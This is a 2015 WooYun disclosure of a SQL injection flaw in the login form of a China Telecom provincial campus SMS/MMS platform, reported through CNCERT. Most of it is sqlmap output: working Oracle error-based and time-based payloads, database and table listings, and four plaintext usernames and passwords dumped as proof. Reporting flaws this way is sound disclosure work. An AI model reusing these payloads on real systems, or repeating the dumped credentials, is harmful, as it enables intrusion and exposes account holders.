当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0145468
漏洞标题:
中国电信某省高校短彩信管理平台SQL注入
相关厂商:
中国电信
漏洞作者:
Ysql404
提交时间:
2015-10-11 21:04
修复时间:
2015-11-30 11:14
公开时间:
2015-11-30 11:14
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

如题

详细说明:

地址:**.**.**.**:8080/adminLogindo.htm
注入参数:login_name

QQ图片20151009073139.png


QQ图片20151009073215.jpg


POST parameter 'login_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 53 HTTP(s) requests:
---
Place: POST
Parameter: login_name
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: cookieexists=false&login_name=admin' AND 1776=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(100)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (1776=1776) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(97)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'WjAM'='WjAM&pwd=admin&imgCode=2357
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: cookieexists=false&login_name=admin' AND 4143=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'VyZJ'='VyZJ&pwd=admin&imgCode=2357
---
[20:26:23] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[20:26:23] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'


available databases [8]:
[*] CTXSYS
[*] DX
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS


Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND                 |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS        |
| CWM2$AWDIMCREATEACCESS         |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS   |
| CWM2$_AW_TEMP_CUST_MEAS_MAP    |
| CWM2$_TEMP_VALUES              |
| OLAP_SESSION_CUBES             |
| OLAP_SESSION_DIMS              |
| XML_LOAD_LOG                   |
| XML_LOAD_RECORDS               |
+--------------------------------+
Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB                  |
| HELP                           |
| MVIEW$_ADV_INDEX               |
| MVIEW$_ADV_OWB                 |
| MVIEW$_ADV_PARTITION           |
| OL$                            |
| OL$HINTS                       |
| OL$NODES                       |
+--------------------------------+
Database: SYS
[30 tables]
+--------------------------------+
| DUAL                           |
| AUDIT_ACTIONS                  |
| AW$AWCREATE                    |
| AW$AWCREATE10G                 |
| AW$AWMD                        |
| AW$AWREPORT                    |
| AW$AWXML                       |
| AW$EXPRESS                     |
| IMPDP_STATS                    |
| KU$NOEXP_TAB                   |
| ODCI_SECOBJ$                   |
| ODCI_WARNINGS$                 |
| OLAPI_HISTORY                  |
| OLAPI_IFACE_OBJECT_HISTORY     |
| OLAPI_IFACE_OP_HISTORY         |
| OLAPI_MEMORY_HEAP_HISTORY      |
| OLAPI_MEMORY_OP_HISTORY        |
| OLAPI_SESSION_HISTORY          |
| OLAPTABLEVELS                  |
| OLAPTABLEVELTUPLES             |
| OLAP_OLEDB_FUNCTIONS_PVT       |
| OLAP_OLEDB_KEYWORDS            |
| OLAP_OLEDB_MDPROPS             |
| OLAP_OLEDB_MDPROPVALS          |
| PLAN_TABLE$                    |
| PSTUBTBL                       |
| STMT_AUDIT_OPTION_MAP          |
| SYSTEM_PRIVILEGE_MAP           |
| TABLE_PRIVILEGE_MAP            |
| WRI$_ADV_ASA_RECO_DATA         |
+--------------------------------+
Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS          |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES                 |
| SDO_COORD_AXIS_NAMES           |
| SDO_COORD_OPS                  |
| SDO_COORD_OP_METHODS           |
| SDO_COORD_OP_PARAMS            |
| SDO_COORD_OP_PARAM_USE         |
| SDO_COORD_OP_PARAM_VALS        |
| SDO_COORD_OP_PATHS             |
| SDO_COORD_REF_SYS              |
| SDO_COORD_SYS                  |
| SDO_CS_SRS                     |
| SDO_DATUMS                     |
| SDO_DATUMS_OLD_SNAPSHOT        |
| SDO_ELLIPSOIDS                 |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    |
| SDO_GEOR_PLUGIN_REGISTRY       |
| SDO_GEOR_XMLSCHEMA_TABLE       |
| SDO_GR_MOSAIC_0                |
| SDO_GR_MOSAIC_1                |
| SDO_GR_MOSAIC_2                |
| SDO_GR_MOSAIC_3                |
| SDO_GR_RDT_1                   |
| SDO_PREFERRED_OPS_SYSTEM       |
| SDO_PREFERRED_OPS_USER         |
| SDO_PRIME_MERIDIANS            |
| SDO_PROJECTIONS_OLD_SNAPSHOT   |
| SDO_TOPO_DATA$                 |
| SDO_TOPO_RELATION_DATA         |
| SDO_TOPO_TRANSACT_DATA         |
| SDO_TXN_IDX_DELETES            |
| SDO_TXN_IDX_EXP_UPD_RGN        |
| SDO_TXN_IDX_INSERTS            |
| SDO_UNITS_OF_MEASURE           |
| SDO_XML_SCHEMAS                |
+--------------------------------+
Database: DX
[62 tables]
+--------------------------------+
| CLASS                          |
| CRM_DICTIONARY_PY              |
| CURRENT_NODE                   |
| I_SMS_HISTORY_INFO             |
| I_SMS_TOKEN_INFO               |
| I_SMS_USER_INFO                |
| I_SMS_USER_INFO_HIS            |
| NODEINFO                       |
| P_RECEIVE_SMS                  |
| P_SEND_SMS                     |
| T                              |
| TEMP1                          |
| TEMP_STATUS                    |
| TEMP_T                         |
| T_CITY_INFO                    |
| T_LOGS                         |
| T_MOBILE                       |
| T_MOBILE_BAK                   |
| T_ONLINE                       |
| T_SYSLOGIN_LOG                 |
| T_SYSMODEL_INFO                |
| T_SYSMODEL_OPER                |
| T_SYSROLE_INFO                 |
| T_SYSROLE_MODEL                |
| T_SYSROLE_MODELAUTH            |
| T_SYSUSER_INFO                 |
| T_TEMPIMPORTDATA               |
| T_TEMPIMPORTDATA_FAIL          |
| T_TEMPLETINFO                  |
| T_TPCOLUMS                     |
| T_TPCONTENT                    |
| T_UPLOADLOG                    |
| U_ACCOUNT                      |
| U_CACHE_MMS                    |
| U_CACHE_MMS_DEL                |
| U_CACHE_SMS                    |
| U_CACHE_SMS_20131130           |
| U_CACHE_SMS_F                  |
| U_CACHE_SMS_HIS                |
| U_CACHE_SMS_TEMP               |
| U_CACHE_SMS_TEST               |
| U_CONF_MMS                     |
| U_CONF_SMS                     |
| U_DEPARTMENT                   |
| U_DEPARTMENT_TEMP              |
| U_MEDIA_INFO                   |
| U_MMS_INFO                     |
| U_PICTURE_INFO                 |
| U_PRODUCTS_INFO                |
| U_SEND_MMS                     |
| U_SEND_MMS_HIS                 |
| U_SEND_SMS                     |
| U_SEND_SMS_HIS                 |
| U_SMS_INFO                     |
| U_SMS_PLATE                    |
| U_SMS_RECEIVE                  |
| U_SP_INFO                      |
| U_STAFF                        |
| U_STAFF_TAG                    |
| U_TEXT_INFO                    |
| U_WHITE_LIST                   |
| V_PRO_MMS                      |
+--------------------------------+
Database: CTXSYS
[3 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE             |
| DR$OBJECT_ATTRIBUTE            |
| DR$POLICY_TAB                  |
+--------------------------------+
Database: WMSYS
[4 tables]
+--------------------------------+
| WM$NEXTVER_TABLE               |
| WM$VERSION_HIERARCHY_TABLE     |
| WM$VERSION_TABLE               |
| WM$WORKSPACES_TABLE            |
+--------------------------------+

漏洞证明:

Database: DX
Table: I_SMS_USER_INFO
[4 entries]
+---------------+-----------+
| PASSWORD      | USER_NAME |
+---------------+-----------+
| 3ggx@icampus  | 3ggx      |
| 3ggx2@icampus | 3ggx2     |
| Jgxy6187      | gsjgy     |
| lzjyzx@123456 | lzjyzx    |
+---------------+-----------+

修复方案:

过滤;

版权声明:转载请注明来源 Ysql404@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-16 11:12

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置

最新状态:

暂无